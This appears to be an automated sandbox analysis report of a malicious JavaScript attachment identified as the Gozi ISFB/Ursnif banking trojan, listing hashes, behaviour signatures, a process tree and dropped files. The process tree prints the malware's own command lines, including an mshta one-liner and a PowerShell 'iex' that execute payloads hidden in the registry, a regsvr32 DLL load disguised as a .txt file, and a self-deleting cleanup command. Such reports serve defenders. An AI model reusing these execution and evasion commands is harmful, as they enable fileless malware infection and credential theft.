Overview

overview

10

Static

static

job_attach_h6x.js

windows7_x64

10

job_attach_h6x.js

windows10_x64

10

Analysis

  • max time kernel
    125s
  • max time network
    69s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    17-04-2020 22:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    job_attach_h6x.js

  • Size

    1.3MB

  • MD5

    c9a6a820f7d344bfd42471b9964049a8

  • SHA1

    bdc1669dec4e00d2d76817379b7b5088fadb471b

  • SHA256

    385f77e0604e9926408a261fb3e56268f60e0fda4f124f2d1b0c1b45d106bdc0

  • SHA512

    8b5d2d1ad55b942a5158036530c7c92cdb7318b4e878ff4d3e31d891b5b4a874914860c708d056b0033872cff006ce542ebdd79d04d13249e9c63c7f2622fa8f

Score
10/10
bankertrojangozi_ifsbursnifspywareevasion

Malware Config

Signatures

  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Makes http(s) request 11 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
    adwarespyware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetThreadContext
    PID:1216
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\job_attach_h6x.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\DeNSXQbUgM.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\Temp\\DeNSXQbUgM.txt
          4⤵
          • Loads dropped DLL
          PID:1168
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\4F9B8A74-6250-5914-E4F3-B69D58D74A21\\DmdlDump'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Modifies Internet Explorer settings
      PID:1132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\4F9B8A74-6250-5914-E4F3-B69D58D74A21").Certxva2))
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • Drops file in System32 directory
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetThreadContext
        PID:1148
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dr4fipwn\dr4fipwn.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1244
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAAEE.tmp" "c:\Users\Admin\AppData\Local\Temp\dr4fipwn\CSCCFCF44488D8E4004BF95D4EA5BA1EF.TMP"
            5⤵
              PID:568
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x03a0wna\x03a0wna.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB7A.tmp" "c:\Users\Admin\AppData\Local\Temp\x03a0wna\CSC8051214C4A3F40E6B21688C7EEE55C83.TMP"
              5⤵
                PID:808
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DeNSXQbUgM.txt"
          2⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          PID:1676
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Runs ping.exe
            PID:1604
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2760.bi1"
          2⤵
            PID:1528
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:1208
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2618.bi1"
              2⤵
                PID:1548
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:612
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2760.bi1"
                  2⤵
                    PID:2024
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2618.bi1"
                    2⤵
                      PID:1400
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                    1⤵
                    • Suspicious use of FindShellTrayWindow
                    • Checks whether UAC is enabled
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    • Modifies Internet Explorer settings
                    PID:1560
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1560 CREDAT:275457 /prefetch:2
                      2⤵
                      • Checks whether UAC is enabled
                      • Suspicious use of SetWindowsHookEx
                      • Modifies Internet Explorer settings
                      PID:1736
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1560 CREDAT:406535 /prefetch:2
                      2⤵
                      • Checks whether UAC is enabled
                      • Suspicious use of SetWindowsHookEx
                      • Modifies Internet Explorer settings
                      PID:1032

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\2618.bi1
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\2618.bi1
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\2760.bi1
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\2760.bi1
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\DeNSXQbUgM.txt
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\RESAAEE.tmp
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\RESAB7A.tmp
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\dr4fipwn\dr4fipwn.dll
                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\x03a0wna\x03a0wna.dll
                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\XZ0ZY4UF.txt
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\dr4fipwn\CSCCFCF44488D8E4004BF95D4EA5BA1EF.TMP
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\dr4fipwn\dr4fipwn.0.cs
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\dr4fipwn\dr4fipwn.cmdline
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\x03a0wna\CSC8051214C4A3F40E6B21688C7EEE55C83.TMP
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\x03a0wna\x03a0wna.0.cs
                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\x03a0wna\x03a0wna.cmdline
                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\DeNSXQbUgM.txt
                    Download Submit

                  • memory/1148-14-0x000000001C4B0000-0x000000001C561000-memory.dmp

                    Filesize

                    708KB

                    Download

                  • memory/1216-13-0x00000000026E0000-0x00000000026E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1216-18-0x0000000006EA0000-0x0000000006F51000-memory.dmp

                    Filesize

                    708KB

                    Download

                  • memory/1216-16-0x0000000006EA0000-0x0000000006F51000-memory.dmp

                    Filesize

                    708KB

                    Download

                  • memory/1560-15-0x0000000002B20000-0x0000000002B21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1604-19-0x0000000000190000-0x0000000000191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1676-20-0x0000000002100000-0x00000000021B1000-memory.dmp

                    Filesize

                    708KB

                    Download

                  • memory/1676-17-0x0000000000310000-0x0000000000311000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2016-0-0x0000000002980000-0x0000000002984000-memory.dmp

                    Filesize

                    16KB

                    Download